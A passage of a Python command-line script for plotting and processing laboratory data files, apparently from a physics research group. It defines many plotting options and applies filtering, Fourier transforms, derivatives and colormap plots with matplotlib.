y-data to range between zero and one')\r\nparser.add_argument('--xnorm', action='store_true', help='normalize x-data to range between zero and one')\r\nparser.add_argument('--ymult', type=ssfloats, default=None, help='multiplier to scale y-axes (can be list)')\r\nparser.add_argument('--zeroy', action='store_true', help='shift y-data down to zero by minimum value')\r\nparser.add_argument('--orezy', action='store_true', help='shift y-data to zero by MAXimum value')\r\nparser.add_argument('--meansubtract', action='store_true', help='shift y-data down to zero by average value')\r\nparser.add_argument('--polynomialsubtract', default=False, type=int, help='subtract an n-degree polynomial background from each curve', metavar='DEGREE')\r\nparser.add_argument('--yshifts', type=csfloats, default=None, help='constant shifts to y-data applied after other manipulations; list or single value (creates crude waterfall plot ordered by file sequence)')\r\nparser.add_argument('--waterfall', nargs='?', type=float, default=False, const=1, metavar='MULT', help='toggle waterfall plot; requires two x-columns; optional value specifies multiplier for y-separation')\r\nparser.add_argument('--traces', type=csfloats, default=None, metavar='VALS', help='trace/linecut mode; comma list of values (from x-axis 1) along which to plot traces (vs x-axis 2)')\r\nparser.add_argument('--derivative', nargs='?', type=csints, default=False, const=True, metavar='COLS', help='columns to take derivative/central differences (wrt x-axis; can be list)')\r\nparser.add_argument('--integrate', nargs='?', type=csints, default=False, const=True, metavar='COLS', help='columns to integrate (cumulative trapezoidal summation wrt x-axis; can be list)')\r\nparser.add_argument('--fft', nargs='?', type=csints, default=False, const=True, metavar='COLS', help='columns on which to perform fast Fourier transform')\r\nparser.add_argument('--lpfilter', type=float, default=False, metavar='FREQ', help='perform a low-pass filter operation using the specified cutoff frequency')\r\nparser.add_argument('--hpfilter', type=float, default=False, metavar='FREQ', help='perform a high-pass filter operation using the specified cutoff frequency')\r\nparser.add_argument('--bpfilter', type=csfloats, default=False, metavar='FREQS', help='perform a band-pass filter operation between the specified cutoff frequencies')\r\nparser.add_argument('--invert', nargs='?', type=csints, default=False, const=True, metavar='COLS', help='columns to invert (can be list)')\r\nparser.add_argument('--sharey', action='store_true', help='use same y-range in all panels')\r\n#parser.add_argument('--delimiter', type=str, default='\\t', help='delimiter separating columns')\r\nparser.add_argument('--delimiter', type=str, default=None, help='delimiter separating columns')\r\nparser.add_argument('--superimpose', action='store_true', help='draw all columns together')\r\nparser.add_argument('--vertical', action='store_true', help='draw subplots vertically')\r\nparser.add_argument('--horizontal', action='store_true', help='draw subplots horizontally')\r\nparser.add_argument('--xlim', type=csfloats, default=None, help='specified limits for x-axes')\r\nparser.add_argument('--ylims', type=ssfloats, default=None, help='specified limits for y-axes (can specify panel with semicolons)')\r\nparser.add_argument('--masknegative', nargs='?', type=str, default=False, const=True, metavar='COLOR', help='mask negative values in all loaded colormap data; can take color name for mask color if interpolated')\r\nparser.add_argument('--deleterows', type=csints, default=None, help='row numbers to delete (mask as NaN) in all loaded data (comma list)')\r\nparser.add_argument('--trimspikes', type=csints, default=None, help='column numbers to detect and remove data spikes (mask as NaN)')\r\nparser.add_argument('--monotonic', action='store_true', help='remove points with opposite sweep direction to the average (cuts data with non-monotonic direction in the x-variable)')\r\nparser.add_argument('-c', '--color', type=itstrs, default=None, help='override default line colors (may be comma list)')\r\nparser.add_argument('--colorbyorder', nargs='?', type=str, default=False, const=True, help='use colormap to define line colors based on order of files in list (may also give colormap name)')\r\nparser.add_argument('--lw', type=float, default=None, help='override default linewidth')\r\nparser.add_argument('--ls', type=itstrs, default=None, help='override default linestyles (may be comma list)')\r\nparser.add_argument('--nolegend', action='store_true', help='toggle display of legend')\r\nparser.add_argument('--size', type=csfloats, default=None, metavar='WIDTH,HEIGHT', help='figure size in inches')\r\nparser.add_argument('--dpi', type=float, default=None, metavar='DPI', help='dpi resolution for printed figure')\r\nparser.add_argument('--fontsize', type=float, default=12, metavar='POINTS', help='font size for labels')\r\nargs = parser.parse_args()\r\n\r\n# Plot settings\r\nmpl.rcParams['keymap.quit'] = 'q'\r\nmpl.rcParams['font.size'] = args.fontsize\r\nmpl.rcParams['font.family'] = 'serif'\r\nmpl.rcParams['mathtext.default'] = 'regular'\r\n\r\nmpl.rcParams['legend.fontsize'] = 10\r\nmpl.rcParams['legend.numpoints'] = 1\r\nmpl.rcParams['legend.handletextpad'] = 0.3\r\nmpl.rcParams['legend.frameon'] = False\r\n\r\nmpl.rcParams['lines.linewidth'] = 2\r\nlineprops = dict(ls='none', marker='.')\r\nif args.square:\r\n lineprops['marker'] = 's'\r\nif args.line:\r\n lineprops['ls'] = '-'\r\n if not args.marker:\r\n lineprops['marker'] = ''\r\n if args.line is not True:\r\n lineprops['lw'] = args.line # overrides mpl.rcParams['lines.linewidth'], but can be overridden by args.lw\r\nif args.marker:\r\n colorplot_marker_size = args.marker\r\n if args.marker is not True:\r\n lineprops['ms'] = args.marker\r\nelse:\r\n colorplot_marker_size = 20\r\nif args.lw:\r\n lineprops['lw'] = args.lw # overrides mpl.rcParams['lines.linewidth']\r\n\r\n# custom colormaps\r\nzidict = {'red': ((0.0, 0.3, 0.3),\r\n (0.25,0.2, 0.2),\r\n (0.5, 0.0, 0.0),\r\n (0.75,0.9, 0.9),\r\n (1.0, 1.0, 1.0)),\r\n 'green': ((0.0, 0.75, 0.75),\r\n (0.25,0.3, 0.3),\r\n (0.5, 0.0, 0.0),\r\n (0.75,0.13, 0.13),\r\n (1.0, 0.9, 0.9)),\r\n 'blue': ((0.0, 0.9, 0.9),\r\n (0.25,0.6, 0.6),\r\n (0.5, 0.0, 0.0),\r\n (0.75,0.13, 0.13),\r\n (1.0, 0.04, 0.04))}\r\nzibrov = LinearSegmentedColormap('zibrov', zidict) # similar to 'cool' (but ending in black) + 'hot' colormaps\r\nzibrov_r = zibrov.reversed()\r\nplt.register_cmap(cmap=zibrov)\r\nplt.register_cmap(cmap=zibrov_r)\r\n\r\n \r\n##### functions\r\ndef lorentzian(width, x0=0):\r\n # returns lorenzian with FWHM = width/2, over domain = width\r\n x = np.linspace(-width/2, width/2, width)\r\n hwhm = width/4\r\n f = 1/(1 + ((x-x0)/hwhm)**2)\r\n return f/np.sum(f)\r\n#####\r\n\r\ndef main(fig=None):\r\n # Flatten list of files\r\n files = []\r\n #for sublist in args.files:\r\n globbed_files = [file_or_glob(arg) for arg in args.files]\r\n for sublist in globbed_files:\r\n if type(sublist) is list:\r\n files.extend([fn for fn in sublist])\r\n else:\r\n files.append(sublist)\r\n\r\n # Determine number of columns in first file\r\n with open(files[0], 'r') as first_file:\r\n # Seek to first data row\r\n for line in range(args.header+1):\r\n first_line = first_file.readline()\r\n #totcols = len(first_line.split(args.delimiter))\r\n if args.delimiter:\r\n if args.delimiter == 'None':\r\n args.delimiter = None\r\n totcols = len([col.strip() for col in first_line.split(args.delimiter) if col.strip()])\r\n else:\r\n for delim in ['\\t', None, ',', ';']:\r\n totcols = len([col.strip() for col in first_line.split(delim) if col.strip()])\r\n if totcols > 1:\r\n args.delimiter = delim\r\n break\r\n if args.combinecols:\r\n args.usecols = [args.combinecols[0:1]]\r\n ncols = 1\r\n elif args.usecols:\r\n ncols = len(args.usecols[0])\r\n else:\r\n ncols = totcols - 1\r\n args.usecols = [list(range(totcols)),]\r\n for n, col in enumerate(args.plotvs[0]):\r\n args.usecols[0].pop(col-n)\r\n sq = np.sqrt(ncols)\r\n\r\n #if fig is None:\r\n # Create figure\r\n if args.superimpose:\r\n n, m = 1, 1\r\n elif args.vertical:\r\n n, m = ncols, 1\r\n elif args.horizontal:\r\n n, m = 1, ncols\r\n else:\r\n n, m = int(round(sq)), int(np.ceil(ncols/sq))\r\n fprops = dict(sharex=True)\r\n if args.sharey:\r\n fprops.update(dict(sharey=True))\r\n if args.size:\r\n fprops.update(dict(figsize=args.size, dpi=150))\r\n if args.dpi:\r\n fprops.update(dict(dpi=args.dpi))\r\n fig, axes = plt.subplots(n, m, **fprops)\r\n axes = np.atleast_1d(axes).ravel()\r\n if ncols < n*m:\r\n for ax in axes[ncols:n*m+1]:\r\n ax.set_visible(False)\r\n\r\n # Create event callbacks\r\n fig.canvas.mpl_connect('key_press_event', on_key_press)\r\n #else:\r\n #fig.clf()\r\n\r\n # Load the data\r\n data = []\r\n first_file = True\r\n if args.quiet:\r\n print('loading files...')\r\n for n, (fname, plotvs, usecols) in enumerate(zip(files, it.cycle(args.plotvs), it.cycle(args.usecols))):\r\n with open(fname, 'r') as f:\r\n if args.header:\r\n for line in range(args.header):\r\n header = f.readline()\r\n else:\r\n header = f.readline()\r\n f.seek(0)\r\n\r\n # Update number of columns in case files differ\r\n totcols = len([col.strip() for col in header.split(args.delimiter) if col.strip()])\r\n\r\n # Mode switching\r\n if len(plotvs) > 1 and not (args.waterfall or args.traces):\r\n lineplot_mode = False\r\n colorplot_mode = True\r\n else:\r\n lineplot_mode = True\r\n colorplot_mode = False\r\n if len(plotvs) == 1:\r\n if args.waterfall: # waterfall plot mode selected without second x-column\r\n print('waterfall plot requires two x-axes') # display error message\r\n if args.traces: # traces mode selected without second x-column\r\n print('linecuts require two x-axes (first is dimension from which to extract traces, second is plotting axis)') # display error message\r\n #if len(plotvs) == 1 and args.colorbyvalue:\r\n # print('color-by-value plot requires two x-axes (avg value of 2nd x-column one determines color)')\r\n\r\n # Deal with axes labels\r\n labels = np.asarray(['col {}'.format(col) + 20*'\\0' for col in range(totcols)], dtype=str)\r\n if args.header > 0 or args.listcols: # replace defaults with header labels if they exist\r\n # Header from last file in list used; only last line of header used\r\n #labels = np.asarray([element.strip().strip('#_0123456789') for element in header.split(args.delimiter)], dtype=str)\r\n #labels = np.asarray([element.strip().lstrip('#') for element in header.split(args.delimiter)], dtype=str)\r\n labels = [element.strip().lstrip('#') for element in header.split(args.delimiter)] # keep as list until AFTER label replacement\r\n if args.ifinlabels and args.ifinlabels not in labels:\r\n print(args.ifinlabels, 'not in header; skipping...')\r\n continue\r\n if args.listcols: # moved above label replacement to prevent overwrite before listing column headers\r\n print('list of columns:')\r\n for nl, label in enumerate(labels):\r\n print('{}:\\t{}'.format(nl, label))\r\n sys.exit(0)\r\n for l, label in enumerate(labels):\r\n tex = re.search('[{}_^]', label)\r\n if tex:\r\n twoparts = re.fullmatch('(.+)\\s(\\(.+\\))', label)\r\n if twoparts:\r\n labels[l] = '${}$ {}'.format(twoparts.group(1), twoparts.group(2))\r\n else:\r\n labels[l] = '${}$'.format(label)\r\n if args.ylabels: # replace header labels with custom labels if provided\r\n if lineplot_mode:\r\n #labels[usecols] = args.ylabels\r\n for col, ylabel in zip(usecols, args.ylabels):\r\n labels[col] = ylabel\r\n elif colorplot_mode:\r\n labels[plotvs[1]] = args.ylabels[0]\r\n if args.xlabel:\r\n labels[plotvs[0]] = args.xlabel\r\n if colorplot_mode and args.clabels:\r\n #labels[usecols] = args.clabels\r\n for col, clabel in zip(usecols, args.clabels):\r\n labels[col] = clabel\r\n # convert to numpy array of strings AFTER replacing labels (prevents truncation of long custom labels)\r\n labels = np.asarray(labels)\r\n\r\n # Load the data\r\n try:\r\n if args.timedelta is not False:\r\n args.datetime = args.timedelta # handle both in the same way until plotting\r\n if args.datetime is not False:\r\n date_fmt = '%Y-%m-%dT%H:%M:%S.%f'\r\n str2date = lambda s: datetime.datetime.strptime(s.decode('utf-8').strip(), date_fmt).timestamp() # key missing ingredient was whitespace at the end of string\r\n #str2date = lambda s: float(np.datetime64(s))\r\n #print(str2date('2018-03-22T11:57:03.456'))\r\n if len(args.datetime) > 1: # date and time in separate columns\r\n # read and combine datetime columns\r\n date_fmt = '%d-%m-%y %H:%M:%S' # BlueFors format; note that this is not the same as our special measure format\r\n date_columns = np.loadtxt(fname, usecols=args.datetime, delimiter=args.delimiter, dtype=str)\r\n datetimes = np.array([datetime.datetime.strptime(' '.join((d, t)).strip(), date_fmt).timestamp() for d, t in date_columns])\r\n\r\n # read data columns and fill plotvs[0] with datetimes\r\n data_columns = np.genfromtxt(fname, delimiter=args.delimiter, skip_header=args.header)\r\n data_columns[:, plotvs[0]] = datetimes[:data_columns.shape[0]] # places datetimes in first plotvs columns (default 0); may want to use first datetime column in future; try modifying plotvs[0] itself to store column of args.datetime[0]; this will preserve labeling and such\r\n else:\r\n data_columns = np.loadtxt(fname, delimiter=args.delimiter, converters={args.datetime[0]: str2date})\r\n #data_columns = np.genfromtxt(fname, delimiter=args.delimiter, skip_header=args.header, converters={args.datetime: str2date})\r\n #print(data_columns[0, :])\r\n else:\r\n data_columns = np.loadtxt(f, delimiter=args.delimiter)\r\n except ValueError:\r\n # prepare for chaining\r\n #if n > 0:\r\n # nlast += data_columns.shape[0]\r\n #else:\r\n # nlast = 0\r\n if first_file: # added in haste on 11-15-2018 to allow file filtering based on presence of specific column header\r\n nlast = 0\r\n first_file = False\r\n else:\r\n nlast += data_columns.shape[0]\r\n # method 1: replace first column with row number\r\n #data_columns = np.loadtxt(f, usecols=range(1, totcols), delimiter=args.delimiter)\r\n #data_columns = np.column_stack((np.arange(data_columns.shape[0])+nlast*args.chain, data_columns))\r\n\r\n # method 2: looping try block to skip columns from the left until a valid dataset is loaded (a hack to skip two-column date formats)\r\n #skipcols = 1\r\n #while True:\r\n #try:\r\n #data_columns = np.loadtxt(f, usecols=range(skipcols, totcols), delimiter=args.delimiter)\r\n #data_columns = np.column_stack(skipcols*[np.arange(data_columns.shape[0])+nlast*args.chain] + [data_columns])\r\n #break\r\n #except ValueError:\r\n #skipcols += 1\r\n #continue\r\n\r\n # method 3: skips string values but can do much more with customization; only fill first column with row number\r\n data_columns = np.genfromtxt(fname, delimiter=args.delimiter, skip_header=args.header)\r\n data_columns[:, 0] = np.arange(data_columns.shape[0])+nlast*args.chain\r\n if not (args.xlabel and plotvs[0]==0):\r\n labels[0] = 'points'\r\n\r\n # method 4: currently doesn't work due to matplotlib problem dealing with iterables\r\n #from matplotlib.dates import datestr2num\r\n #data_columns = np.genfromtxt(fname, delimiter=args.delimiter, converters={0: datestr2num})\r\n rows = data_columns.shape[0]\r\n stdoutstr = '{}\\t{} rows\\t{} columns'\r\n if rows == 0:\r\n stdoutstr += '\\tskipping empty file'\r\n if not args.quiet:\r\n print(stdoutstr.format(fname, rows, totcols))\r\n data.append(None) # need empty element for correct file counting\r\n continue\r\n\r\n if args.masknegative:\r\n data_columns[:, usecols] = np.where(data_columns[:,usecols]<0, np.nan, data_columns[:,usecols])\r\n if args.deleterows:\r\n if not args.quiet:\r\n print('deleting specified rows.. ', end='')\r\n for row in args.deleterows:\r\n data_columns[row, usecols] = np.nan\r\n if not args.quiet:\r\n print('{} rows deleted'.format(len(args.deleterows)))\r\n if args.trimspikes:\r\n for trimcol in args.trimspikes:\r\n if not args.quiet:\r\n print('trimming spikes in column {}.. '.format(trimcol), end='')\r\n def nan_get(y): # returns boolean array and function yielding indices of NaNs\r\n return np.isnan(y), lambda z: z.nonzero()[0]\r\n col = data_columns[:, trimcol]\r\n nans, idx = nan_get(col) # find the NaNs\r\n col[nans] = np.interp(idx(nans), idx(~nans), col[~nans]) # replace NaNs with interpolated values\r\n avg = np.convolve(col, np.array([1,1,0,1,1])/4, 'same')\r\n # remove data which differs from the rolling average\r\n spikes = np.fabs((col-avg)/avg) > 0.02 # by 2%\r\n #plt.plot(col)\r\n #plt.plot(avg, '.')\r\n #plt.plot((col-avg)/avg, '-.')\r\n data_columns[spikes, trimcol] = np.nan\r\n if not args.quiet:\r\n print('{} elements removed'.format(np.sum(spikes)))\r\n if args.monotonic:\r\n if not args.quiet:\r\n print('clipping data with non-monotonic sweep direction.. ', end='')\r\n xdata = data_columns[:, plotvs[0]]\r\n direction = np.sign(np.mean(np.diff(xdata)))\r\n if direction > 0:\r\n cut_rows = xdata != np.maximum.accumulate(xdata)\r\n else:\r\n cut_rows = xdata != np.minimum.accumulate(xdata)\r\n for col in usecols:\r\n data_columns[cut_rows, col] = np.nan\r\n print('{} elements deleted'.format(cut_rows.size))\r\n if args.combinecols:\r\n data_columns[:, usecols] = np.sqrt(np.sum(data_columns[:, args.combinecols]**2, axis=1, keepdims=True))\r\n if not args.ylabels:\r\n newlabels = list(labels) # convert to list for mutability\r\n newlabels[args.combinecols[0]] = '$\\sqrt{{[{}]^2+[{}]^2}}$'.format(*labels[args.combinecols]) # overwrite new label\r\n labels = np.asarray(newlabels, dtype=str) # convert back to array (cannot otherwise change size of array or string length)\r\n if args.yshift:\r\n data_columns[:, usecols] += args.yshift\r\n if args.boxcar:\r\n for col in usecols:\r\n data_columns[:, col] = np.convolve(data_columns[:, col], np.ones((args.boxcar,))/args.boxcar, 'same')\r\n data_columns[:args.boxcar, col] = np.nan # mask elements outside valid boxcar range\r\n data_columns[-args.boxcar:, col] = np.nan # mask elements outside valid boxcar range\r\n if args.xboxcar:\r\n data_columns[:, plotvs[0]] = np.convolve(data_columns[:, plotvs[0]], np.ones((args.xboxcar,))/args.xboxcar, 'same')\r\n data_columns[:args.xboxcar, plotvs[0]] = np.nan # mask elements outside valid boxcar range\r\n data_columns[-args.xboxcar:, plotvs[0]] = np.nan # mask elements outside valid boxcar range\r\n if args.x2boxcar:\r\n data_columns[:, plotvs[1]] = np.convolve(data_columns[:, plotvs[1]], np.ones((args.x2boxcar,))/args.x2boxcar, 'same')\r\n data_columns[:args.x2boxcar, plotvs[1]] = np.nan # mask elements outside valid boxcar range\r\n data_columns[-args.x2boxcar:, plotvs[1]] = np.nan # mask elements outside valid boxcar range\r\n if args.lorentz: # lorentzian blur of data\r\n for col in usecols:\r\n data_columns[:, col] = np.convolve(data_columns[:, col], lorentzian(args.lorentz), 'same')\r\n data_columns[:args.lorentz, col] = np.nan # mask elements outside valid lorentz range\r\n data_columns[-args.lorentz:, col] = np.nan # mask elements outside valid lorentz range\r\n if args.interpolate and (lineplot_mode or len(args.interpolate) == 1): # colorplot interpolation must occur after all file data has been collected\r\n interpX = args.interpolate[0] # only use X1, X2, Nx group (ignore beyond semicolon in argument)\r\n if len(interpX) < 3: # use data limits for interpolation limits\r\n X1, X2, Nx = np.nanmin(data_columns[:, plotvs[0]]), np.nanmax(data_columns[:, plotvs[0]]), int(interpX[0])\r\n else: # use user-provided limits\r\n X1, X2, Nx = interpX\r\n Nx = int(Nx)\r\n data_fn = sci.interp1d(data_columns[:, plotvs[0]], data_columns[:, usecols], axis=0)\r\n #axis=0, fill_value='extrapolate')\r\n raw_data_columns = data_columns\r\n data_columns = np.empty((Nx, totcols))\r\n data_columns[:, plotvs[0]] = np.linspace(X1, X2, Nx)\r\n data_columns[:, usecols] = data_fn(data_columns[:, plotvs[0]])\r\n stdoutstr += '\\tinterpolated and resampled to {} rows'.format(Nx)\r\n for col in args.symmetrize:\r\n data_columns[:, col] = 0.5*(data_columns[:, col] + data_columns[::-1, col])\r\n axes[usecols.index(col)].set_title('symmetrized')\r\n for col in args.antisymmetrize:\r\n data_columns[:, col] = 0.5*(data_columns[:, col] - data_columns[::-1, col])\r\n axes[usecols.index(col)].set_title('antisymmetrized')\r\n if args.divcol:\r\n data_columns[:, usecols] *= 1/data_columns[:, args.divcol][:, None]\r\n if args.xdivcol:\r\n data_columns[:, plotvs[0]] *= 1/data_columns[:, args.xdivcol]\r\n if args.derivative:\r\n if type(args.derivative) is list:\r\n derivcols = args.derivative\r\n elif args.derivative is True:\r\n derivcols = usecols.copy()\r\n data_columns[:, derivcols] = np.gradient(data_columns[:, derivcols], np.squeeze(data_columns[:, plotvs[0]]), axis=0)\r\n if not args.ylabels:\r\n for derivcol in [derivcol for derivcol in derivcols if derivcol in usecols]:\r\n labels[derivcol] = 'derivative of {}'.format(labels[derivcol])\r\n# if args.meansubtract:\r\n# data_columns[:, usecols] -= np.nanmean(data_columns[:, usecols], axis=0)\r\n if args.integrate:\r\n if type(args.integrate) is list:\r\n intcols = args.integrate\r\n elif args.integrate is True:\r\n intcols = usecols.copy()\r\n data_columns[:, intcols] = scg.cumtrapz(data_columns[:, intcols], data_columns[:, plotvs[0]], axis=0, initial=0)\r\n if not args.ylabels:\r\n for intcol in [intcol for intcol in intcols if intcol in usecols]:\r\n labels[intcol] = 'integral of {}'.format(labels[intcol])\r\n if args.fft:\r\n if type(args.fft) is list:\r\n fftcols = args.fft\r\n elif args.fft is True:\r\n fftcols = usecols.copy()\r\n FFT = np.fft.rfft(data_columns[:, fftcols], axis=0)\r\n data_columns[:, fftcols] = np.nan\r\n data_columns[:FFT.shape[0], fftcols] = FFT.real\r\n FREQ = np.fft.rfftfreq(data_columns.shape[0], d=np.fabs(np.mean(np.diff(data_columns[:, plotvs[0]]))))\r\n data_columns[:, plotvs[0]] = np.nan\r\n data_columns[:FFT.shape[0], plotvs[0]] = FREQ\r\n if not args.ylabels:\r\n for fftcol in [fftcol for fftcol in fftcols if fftcol in usecols]:\r\n labels[fftcol] = 'FFT[{}]'.format(labels[fftcol])\r\n if not args.xlabel:\r\n labels[plotvs[0]] = '1 / {}'.format(labels[plotvs[0]])\r\n if args.lpfilter:\r\n order = 10\r\n filt = scs.butter(order, args.lpfilter, btype='lowpass', output='sos', fs=1/np.fabs(np.mean(np.diff(data_columns[:, plotvs[0]]))))\r\n for u in usecols:\r\n data_columns[:, u] = scs.sosfilt(filt, data_columns[:, u])\r\n if args.hpfilter:\r\n order = 10\r\n filt = scs.butter(order, args.hpfilter, btype='highpass', output='sos', fs=1/np.fabs(np.mean(np.diff(data_columns[:, plotvs[0]]))))\r\n for u in usecols:\r\n data_columns[:, u] = scs.sosfilt(filt, data_columns[:, u])\r\n if args.bpfilter:\r\n order = 10\r\n filt = scs.butter(order, args.bpfilter, btype='bandpass', output='sos', fs=1/np.fabs(np.mean(np.diff(data_columns[:, plotvs[0]]))))\r\n for u in usecols:\r\n data_columns[:, u] = scs.sosfilt(filt, data_columns[:, u])\r\n if args.invert is not False or args.xinvert:\r\n if type(args.invert) is list:\r\n invcols = args.invert\r\n elif args.invert is True:\r\n invcols = usecols.copy()\r\n else:\r\n invcols = []\r\n if args.xinvert:\r\n invcols.extend(plotvs)\r\n invcols = list(set(invcols))\r\n if not args.xlabel:\r\n for invcol in [invcol for invcol in invcols if invcol in plotvs]:\r\n labels[invcol] = '1 / {}'.format(labels[invcol])\r\n data_columns[:, invcols] = 1/data_columns[:, invcols]\r\n if not args.ylabels:\r\n for invcol in [invcol for invcol in invcols if invcol in usecols]:\r\n labels[invcol] = '1 / {}'.format(labels[invcol])\r\n data.append(data_columns)\r\n if not args.quiet:\r\n print(stdoutstr.format(fname, rows, totcols))\r\n\r\n for p, (ax, col, label) in enumerate(zip(it.cycle(axes),\r\n #data[n][:, args.usecols[:data[n].shape[1]-3]].T,\r\n data[n][:, usecols].T,\r\n labels[usecols])):\r\n formatter = EngFormatter(sep=u'\\N{THIN SPACE}') # format axes using engineering notation\r\n ax.xaxis.set_major_formatter(formatter)\r\n ax.yaxis.set_major_formatter(formatter)\r\n\r\n xdata = data[n][:, plotvs[0]].copy()\r\n if colorplot_mode or args.waterfall:\r\n ydata = data[n][:, plotvs[1]] #.copy()\r\n xdata = data[n][:, plotvs[0]] # don't use a copy; this allows xdata manipulations through to colorplot\r\n col = data[n][:, usecols[p]] # don't copy; allows direct manipulation to propogate to colorplot\r\n if args.traces:\r\n tr_data = data[n][:, plotvs[0]]\r\n xdata = data[n][:, plotvs[1]] #don't use a copy; this allows xdata manipulations through to colorplot\r\n if args.xmult:\r\n if len(args.xmult) > 1 and len(args.xmult[0]) > 1:\r\n xmult = args.xmult[n][p]\r\n elif len(args.xmult) > 1:\r\n xmult = args.xmult[n][0]\r\n elif len(args.xmult[0]) > 1:\r\n xmult = args.xmult[0][p]\r\n elif p == 0: # if only one multiplier provided, only multiply the x-axis data one time (otherwise it applies xmult^p)\r\n xmult = args.xmult[0][0]\r\n else:\r\n xmult = 1\r\n xdata *= xmult\r\n if args.x2mult and (colorplot_mode or args.waterfall):\r\n if len(args.x2mult) > 1 and len(args.x2mult[0]) > 1:\r\n x2mult = args.x2mult[n][p]\r\n elif len(args.x2mult) > 1:\r\n x2mult = args.x2mult[n][0]\r\n elif len(args.x2mult[0]) > 1:\r\n x2mult = args.x2mult[0][p]\r\n elif p == 0: # if only one multiplier provided, only multiply the x2-axis data one time (otherwise it applies x2mult^p)\r\n x2mult = args.x2mult[0][0]\r\n else:\r\n x2mult = 1\r\n ydata *= x2mult\r\n if args.xshifts:\r\n if len(args.xshifts) > 1 and len(args.xshifts[0]) > 1:\r\n xshifts = args.xshifts[n][p]\r\n elif len(args.xshifts) > 1:\r\n if len(args.xshifts) < len(files): # cycle instead\r\n if n == 0:\r\n iterxshifts = it.cycle(args.xshifts)\r\n xshifts = next(iterxshifts) # doesn't work if there is more than one panel\r\n else:\r\n xshifts = args.xshifts[n][0]\r\n elif len(args.xshifts[0]) > 1:\r\n xshifts = args.xshifts[0][p]\r\n else:\r\n xshifts = args.xshifts[0][0]\r\n xdata += xshifts\r\n if args.fold:\r\n xdata = np.fabs(xdata)\r\n if args.xnorm:\r\n xmin, xmax = np.nanmin(xdata), np.nanmax(xdata)\r\n xdata -= xmin\r\n xdata *= 1/(xmax-xmin)\r\n if not args.ylabels and args.divcol:\r\n label += ' / {}'.format(labels[args.divcol])\r\n if args.normy:\r\n ymin, ymax = np.nanmin(col), np.nanmax(col)\r\n col -= ymin\r\n col *= 1/(ymax-ymin)\r\n if not args.ylabels:\r\n label = 'normalized ' + label\r\n if args.ymult:\r\n if len(args.ymult) > 1 and len(args.ymult[0]) > 1:\r\n ymult = args.ymult[n][p]\r\n elif len(args.ymult) > 1:\r\n ymult = args.ymult[n][0]\r\n elif len(args.ymult[0]) > 1:\r\n ymult = args.ymult[0][p]\r\n else:\r\n ymult = args.ymult[0][0]\r\n col *= ymult\r\n if not args.ylabels:\r\n label += r'$\\times {:.3g}$'.format(ymult)\r\n if args.zeroy:\r\n col -= np.nanmin(col)\r\n if not args.ylabels:\r\n label += ' - ymin'\r\n if args.orezy:\r\n col -= np.nanmax(col)\r\n if not args.ylabels:\r\n label += ' - ymax'\r\n if args.meansubtract:\r\n col -= np.nanmean(col)\r\n if not args.ylabels:\r\n label += ' - ymean'\r\n if args.polynomialsubtract:\r\n polynomial = np.polyfit(xdata, col, args.polynomialsubtract)\r\n col -= np.polyval(polynomial, xdata)\r\n if not args.ylabels:\r\n label += ' - {:g}d polynomial fit'.format(args.polynomialsubtract)\r\n if args.yshifts:\r\n if len(args.yshifts)>1:\r\n col += args.yshifts[n]\r\n else: # Waterfall plot ordered by file sequence\r\n if colorplot_mode:\r\n data[n][:, plotvs[1]] += n*args.yshifts[0]\r\n else:\r\n col += n*args.yshifts[0]\r\n if args.hysteresis:\r\n if n % 2: # odd, and therefore second file of each pair\r\n if colorplot_mode:\r\n data[n][:, usecols] = data[n][:, usecols] - np.flip(data[n-1][:, usecols])\r\n data[n-1][:, usecols] = np.nan\r\n else:\r\n col = col - lastcol\r\n else:\r\n lastcol = np.flip(col)\r\n continue\r\n if args.waterfall: # Waterfall plot mode\r\n col += args.waterfall*ydata # separate lines by second x-value times multiplier (default 1)\r\n if args.traces: # trace plot mode\r\n cidx = np.asarray([np.nanargmin(np.fabs(tr_value-tr_data)) for tr_value in args.traces])\r\n traces = col[cidx]\r\n col = np.full_like(col, np.nan)\r\n col[cidx] = traces\r\n if colorplot_mode: # Colorplot mode\r\n xlabel = labels[plotvs[0]]\r\n ylabel = labels[plotvs[1]]\r\n clabel = label\r\n if args.cornplot: # Special colorplot for data versus rotating field\r\n xdata, ydata = ydata*np.sin(xdata*np.pi/180), ydata*np.cos(xdata*np.pi/180)\r\n ylabel = 'parallel magnetic field (T)'\r\n xlabel = 'perpendicular magnetic field (T)' \r\n if (n == 0 or (args.hysteresis and n==1)) and p == 0:\r\n crange = len(axes)*[()]\r\n gcmin, gcmax = np.full(len(axes), np.nan), np.full(len(axes), np.nan)\r\n if not args.crange:\r\n col = np.ma.masked_invalid(col)\r\n if args.logz:\r\n col = np.ma.masked_less_equal(col, 0)\r\n cmin, cmax = np.nanmin(col), np.nanmax(col)\r\n gcmin[p], gcmax[p] = np.nanmin([cmin, gcmin[p]]), np.nanmax([cmax, gcmax[p]]) # set global min/max for this panel\r\n crange[p] = gcmin[p], gcmax[p] # use global upper and lower limits considering all files\r\n if not args.quiet:\r\n print('{} data ranges from approx {:.6g} to {:.6g}; global limits {:.6g} to {:.6g}'.format(clabel, cmin, cmax, *crange[p]))\r\n elif n == 0:\r\n if len(args.crange) > 1:\r\n crange[p] = args.crange[p]\r\n else:\r\n crange[p] = args.crange[0]\r\n # Ends up labeling based on last file in list\r\n ax.set_ylabel(ylabel)\r\n ax.set_xlabel(xlabel)\r\n \r\n #if not args.interpolate or len(args.interpolate) == 1: # colorplot based on raw data (scattered points); interpolation handled after collecting all files\r\n #cplot_props = dict(s=colorplot_marker_size, edgecolors='none')\r\n #if args.square:\r\n #cplot_props['marker'] = 's'\r\n #cplot = ax.scatter(xdata, ydata, c=col, cmap=args.cmap, vmin=crange[p][0], vmax=crange[p][1], **cplot_props)\r\n ##ax.autoscale(enable=True, axis='both', tight=True)\r\n #if n == 0: # add colorbar first time around\r\n #cbar = fig.colorbar(cplot, ax=ax)\r\n #cbar.set_label(clabel)\r\n #cbar.set_clim(*crange[p]) # update colorbar limits (only scales colormap)\r\n #cbar.draw_all() # will not redraw ticks/limits without this\r\n if lineplot_mode:\r\n if args.colorbyorder:\r\n if type(args.colorbyorder) is str:\r\n cm = mcm.get_cmap(args.colorbyorder)\r\n else:\r\n cm = mcm.get_cmap(args.cmap)\r\n lineprops['c'] = cm(n/(len(files)-1)) \r\n elif args.color:\r\n lineprops['c'] = next(args.color)\r\n elif args.ls:\r\n lineprops['ls'] = next(args.ls)\r\n if args.datetime is not False: # date_plot mode\r\n datetimes = [datetime.datetime.fromtimestamp(ts) for ts in xdata]\r\n ax.xaxis.set_major_formatter(mpl.dates.DateFormatter('%b %d, %H:%M')) # month, day 